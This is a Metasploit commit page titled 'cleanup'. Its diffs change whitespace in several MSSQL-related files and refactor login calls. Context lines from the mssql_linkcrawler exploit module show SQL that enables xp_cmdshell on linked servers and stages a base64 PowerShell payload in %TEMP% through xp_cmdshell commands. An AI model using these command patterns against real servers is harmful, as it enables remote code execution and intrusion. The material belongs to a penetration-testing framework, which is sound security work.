cleanup

rapid7 · Jan 24, 2024 · 3cfd069 · 3cfd069
1 parent 2ba4924
commit 3cfd069
Show file tree

Hide file tree

Showing 6 changed files with 10 additions and 12 deletions.
diff --git a/lib/metasploit/framework/tcp/client.rb b/lib/metasploit/framework/tcp/client.rb
@@ -73,6 +73,7 @@ module Client
         # @see Rex::Socket::Tcp
         # @see Rex::Socket::Tcp.create
         def connect(global = true, opts={})
+
           dossl = false
           if(opts.has_key?('SSL'))
             dossl = opts['SSL']
@@ -97,7 +98,6 @@ def connect(global = true, opts={})
           # enable evasions on this socket
           set_tcp_evasions(nsock)
 
-
           # Set this socket to the global socket as necessary
           self.sock = nsock if (global)
 

diff --git a/lib/msf/core/module/alert.rb b/lib/msf/core/module/alert.rb
@@ -202,7 +202,7 @@ def add_alert(level, msg, &block)
   def alert_user
     self.you_have_been_warned ||= {}
 
-    errors.each do |msg| 
+    errors.each do |msg|
       if msg && !self.you_have_been_warned[msg.hash]
         print_error(msg)
         self.you_have_been_warned[msg.hash] = true

diff --git a/lib/rex/proto/mssql/client.rb b/lib/rex/proto/mssql/client.rb
@@ -66,9 +66,9 @@ def initialize(framework_module, framework, rhost, rport = 1433)
         #
         def mssql_login(user='sa', pass='', db='', domain_name='')
           disconnect if self.sock
-
           connect
           mssql_prelogin
+
           if auth == Msf::Exploit::Remote::AuthOption::KERBEROS
             idx = 0
             pkt = ''

diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb
@@ -19,7 +19,6 @@ module to work, valid administrative user credentials must be
       'Author'         => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
       'License'        => MSF_LICENSE
     ))
-
   end
 
   def run

diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
@@ -342,7 +342,6 @@ def sql_statement()
 
     # CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
     begin
-      #here
       result = mssql_query(sql, false) if mssql_login_datastore
 
       column_data = result[:rows]

diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -78,7 +78,7 @@ def exploit
     # Check if credentials are correct
     print_status("Attempting to connect to SQL Server at #{datastore['RHOST']}:#{datastore['RPORT']}...")
 
-    if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if !mssql_login_datastore
       print_error("Invalid SQL Server credentials")
       print_status("-------------------------------------------------")
       return
@@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled)
         # Enabling show advanced options and xp_cmdshell
         execute = "sp_configure 'show advanced options',1;reconfigure"
         sql = query_builder_rpc(path,"",0,execute)
-        result = mssql_login_datastore
+        result = mssql_query(sql, false) if mssql_login_datastore
       end
 
       # Enabling xp_cmdshell
       print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
       execute = "sp_configure 'xp_cmdshell',1;reconfigure"
       sql = query_builder_rpc(path,"",0,execute)
-      result = mssql_login_datastore
+      result = mssql_query(sql, false) if mssql_login_datastore
     end
 
     # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_login_datastore
+    result = mssql_query(sql, false) if mssql_login_datastore
     xpcmdNow = result[:rows].pop.pop
 
     if xpcmdNow == 1 or xpcmdOrig == 1
@@ -510,19 +510,19 @@ def powershell_upload_exec(path)
     mytext_64.scan(/.{1,2500}/).each {|part|
       execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
       sql = query_builder(path,"",0,execute)
-      result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+      result = mssql_query(sql, false) if mssql_login_datastore
       linenum = linenum+1
     }
 
     # Remove duplicate lines from temp file and write to new file
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    result = mssql_query(sql, false) if mssql_login_datastore
 
     # Remove tracking tags from lines
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
+    result = mssql_query(sql, false) if mssql_login_datastore
 
     # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
     # If running on 64bit system, 32bit powershell called from syswow64
-Original file line number
+Diff line change
@@ Expand Up / @@ -19,7 +19,6 @@ module to work, valid administrative user credentials must be @@
           'Author'         => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
           'License'        => MSF_LICENSE
         ))
       end
       def run
@@ Expand Down @@